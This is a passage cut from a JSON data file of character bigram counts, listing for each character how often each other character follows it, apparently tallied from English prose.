2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], ["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], ["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], ["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 4], ["y", 88], ["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], ["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], ["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], ["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], ["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], ["h", 5152], ["k", 34], ["m", 374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], ["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], ["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], ["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], ["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], ["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], [":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], [":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], ["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], ["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], ["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], ["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], ["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], ["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], ["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], ["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], ["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], 